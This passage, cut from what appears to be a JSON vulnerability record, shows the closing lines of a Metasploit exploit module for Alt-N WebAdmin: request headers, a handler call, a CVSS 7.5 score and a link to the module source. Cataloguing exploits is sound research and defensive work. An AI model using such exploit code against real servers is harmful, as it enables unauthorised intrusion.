image/png',\n 'Accept-Language' => 'en',\n 'Accept-Charset' => 'iso-8859-1,*,utf-8'\n }\n }, 5)\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/altn_webadmin.rb"}]}